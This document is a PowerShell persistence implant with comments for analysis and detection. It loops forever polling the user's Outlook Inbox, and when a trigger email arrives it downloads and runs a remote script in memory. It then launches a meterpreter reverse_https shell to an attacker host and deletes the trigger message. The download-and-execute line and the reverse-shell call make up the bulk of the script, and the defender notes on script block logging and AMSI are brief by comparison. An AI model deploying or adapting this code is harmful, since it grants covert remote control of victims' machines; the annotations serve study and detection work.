# Persist.ps1 - mailbox-triggered execution loop, annotated for analysis and detection.
#
# What the code below does: in an endless loop it opens the current user's
# Outlook Inbox over COM, looks for a message whose sender and subject match
# two configured values, and for each match starts a background job that
# downloads a script, runs it in memory and calls Invoke-Shellcode. A second
# pass then deletes the triggering message from the Inbox.
#
# Defender notes (general telemetry, not specific to this sample):
#   - PowerShell Script Block Logging (event ID 4104) and AMSI see the
#     DownloadString / IEX content at the point it is evaluated.
#   - A powershell.exe process instantiating Outlook.Application and making
#     outbound HTTPS connections is an unusual combination worth alerting on.
#   - Outlook's programmatic-access protection and PowerShell Constrained
#     Language Mode both restrict this kind of COM automation; verify how they
#     are configured in the environment under review.

# Sender address used as the first half of the trigger. The value shown here is
# what the hosting page's e-mail obfuscation left behind, not a usable address.
$AttackerEmail = "[email protected]"
# Subject text used as the second half of the trigger (placeholder value).
$TriggerWord = "EMAILSUBJECT"
# No exit condition: the loop runs until the hosting PowerShell process ends.
While($True){
# 6 is the Outlook OlDefaultFolders value for the Inbox (olFolderInbox).
$olFolderInbox = 6
# A new Outlook COM object is requested on every iteration.
# NOTE(review): this presumably starts OUTLOOK.EXE if it is not already running - confirm on a test host.
$outlook = new-object -com outlook.application;
$ns = $outlook.GetNameSpace("MAPI");
$inbox = $ns.GetDefaultFolder($olFolderInbox)
$Emails = $inbox.items
# Pass 1: scan every Inbox item. -match is a regular-expression match, so the
# configured values are treated as patterns, not exact strings.
$Emails | foreach {
if($_.SenderEmailAddress -match $AttackerEmail -and $_.subject -match $TriggerWord)
{Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient
IEX $WebClientObject.DownloadString('PAYLOAD_URL')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST xxx.xxx.xx.xxx -LPORT yyyy -Force}
}}
# The job above runs in the background. Invoke-Shellcode is not defined in this
# file; presumably it is supplied by the script fetched from PAYLOAD_URL.
# PAYLOAD_URL, the LHOST octets and the LPORT value are unfilled placeholders.
#
# Pass 2: scan the Inbox again and delete the trigger message. The filter here
# uses -eq (exact equality), unlike the -match test that gates this branch.
# NOTE(review): Outlook's Delete() normally moves an item to Deleted Items
# rather than purging it, so the message may still be recoverable there and
# from server-side retention - confirm for the mailbox in question.
$Emails | foreach {
if($_.SenderEmailAddress -match $AttackerEmail -and $_.subject -match $TriggerWord)
{$OutlookFolders = $outlook.Session.Folders.Item(1).Folders
$EmailInFolderToDelete = $outlook.Session.Folders.Item(1).Folders.Item("Inbox").Items
$EmailToDelete = $EmailInFolderToDelete | Where-Object {$_.Subject -eq $TriggerWord -and $_.SenderEmailAddress -eq $AttackerEmail}
$EmailToDelete.Delete() }
}
#This determines how often the script checks in. Lower sleep time == more noise
# With the value below, the Inbox is enumerated over COM every 10 seconds; that
# fixed cadence is itself a behavioural signal in process and COM telemetry.
Start-Sleep -s 10
}